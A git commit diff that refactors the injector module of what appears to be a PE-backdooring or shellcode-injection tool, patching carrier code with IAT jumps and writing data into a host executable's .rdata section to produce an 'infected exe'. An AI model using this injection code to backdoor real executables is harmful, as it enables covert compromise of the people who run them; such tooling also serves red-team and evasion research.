refactor: removed DataReuser

phases/injector.py

@@ -12,7 +12,6 @@ from model.exehost import *
 from observer import observer
 from helper import rbrunmode_str
 from derbackdoorer.derbackdoorer import PeBackdoor
-from phases.datareuse import DataReuser
 
 
 logger = logging.getLogger("Injector")
@@ -64,83 +63,59 @@ def injected_fix_iat(exe_out: FilePath, carrier: Carrier, exe_host: ExeHost):
     # get code section of exe_out
     code = extract_code_from_exe(exe_out)
 
-    for IatRequest in carrier.get_all_iat_requests():
-        if not IatRequest.placeholder in code:
-            raise Exception("IatResolve ID {} not found, abort".format(IatRequest.placeholder))
-        addr = exe_host.get_addr_of_iat_function(IatRequest.name)
-        if addr == None:
-            raise Exception("IatResolve: Function {} not found".format(IatRequest.name))
+    for iatRequest in carrier.get_all_iat_requests():
+        if not iatRequest.placeholder in code:
+            raise Exception("IatResolve ID {} not found, abort".format(iatRequest.placeholder))
+        destination_virtual_address = exe_host.get_addr_of_iat_function(iatRequest.name)
+        if destination_virtual_address == None:
+            raise Exception("IatResolve: Function {} not found".format(iatRequest.name))
         
-        off = code.index(IatRequest.placeholder)
-        current_address = off + exe_host.image_base + exe_host.code_virtaddr
-        #current_address += 2
-        destination_address = addr
-        logger.info("    Replace at 0x{:x} with call to 0x{:x}".format(
-            current_address, destination_address
+        offset_from_code = code.index(iatRequest.placeholder)
+        instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
+        logger.info("    Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
+            iatRequest.placeholder, instruction_virtual_address, destination_virtual_address
         ))
         jmp = assemble_and_disassemble_jump(
-            current_address, destination_address
+            instruction_virtual_address, destination_virtual_address
         )
-        code = code.replace(IatRequest.placeholder, jmp)
+        code = code.replace(iatRequest.placeholder, jmp)
 
     # write back our patched code into the exe
     write_code_section(exe_file=exe_out, new_data=code)
 
 
 def injected_fix_data(exe_path, carrier: Carrier, exe_host: ExeHost):
-    data_reuser = DataReuser(exe_path)
-    data_reuser.init()
-    #ret = data_reuser.get_reloc_largest_gap(".rdata")
-    #size = ret[0]
-    #start = ret[1]
-    #stop = ret[2]
-    #print("GAP: {} {} {}".format(size, start, stop))
-    #addr = start
-
-    # Insert my data into the .rdata section
-    sect = data_reuser.get_section_by_name(".rdata")
-    addr = sect.raw_addr + 0x1AB0 #+ 0x1000
-    #addr += 0x100
-    #addr = 0
-    print("Write into .data:".format())
-    data_reuser.pe.close()
-
+    # Insert my data into the .rdata section.
+    # Chose and save each datareuse_fixup's addres.
     reusedata_fixups: List[DataReuseEntry] = carrier.get_all_reusedata_fixups()
-
+    sect = exe_host.superpe.get_section_by_name(".rdata")
+    addr = sect.raw_addr + 0x1AB0 # NEEDED, > 1A00!
     with open(exe_path, "r+b") as f:
         for datareuse_fixup in reusedata_fixups:
             var_data = datareuse_fixup.data
-
             print("    Addr: {} / 0x{:X}  Data: {}".format(
                 addr, addr, len(var_data)))
-
-            # Overwrite data in the .rdata section with ours
-            #data_reuser.pe.set_bytes_at_offset(addr, var_data)
             f.seek(addr)
             f.write(var_data)
-            #f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAA")
-            print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base))
             datareuse_fixup.addr = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr
             addr += len(var_data) + 8
-    #data_reuser.pe.write(exe_path + ".tmp")
-    #data_reuser.pe.close()
-    #shutil.move(exe_path + ".tmp", exe_path)
 
     # patch code section
+    # replace the placeholder with a LEA instruction to the data we written above
     code = extract_code_from_exe(exe_path)
     for datareuse_fixup in reusedata_fixups:
         if not datareuse_fixup.randbytes in code:
             raise Exception("DataResuse: ID {} not found, abort".format(
                 datareuse_fixup.randbytes))
         
-        off = code.index(datareuse_fixup.randbytes)
-        current_address = off + exe_host.image_base + exe_host.code_virtaddr
-        destination_address = datareuse_fixup.addr
-        logger.info("    Replace at 0x{:x} with call to 0x{:x}".format(
-            current_address, destination_address
+        offset_from_datasection = code.index(datareuse_fixup.randbytes)
+        instruction_virtual_address = offset_from_datasection + exe_host.image_base + exe_host.code_virtaddr
+        destination_virtual_address = datareuse_fixup.addr
+        logger.info("    Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
+            datareuse_fixup.randbytes, instruction_virtual_address, destination_virtual_address
         ))
         lea = assemble_lea(
-            current_address, destination_address, datareuse_fixup.register
+            instruction_virtual_address, destination_virtual_address, datareuse_fixup.register
         )
         code = code.replace(datareuse_fixup.randbytes, lea)
 
@@ -148,7 +123,6 @@ def injected_fix_data(exe_path, carrier: Carrier, exe_host: ExeHost):
     write_code_section(exe_file=exe_path, new_data=code)
 
 
-
 def verify_injected_exe(exefile: FilePath) -> int:
     logger.info("---[ Verify infected exe: {} ".format(exefile))
     # remove indicator file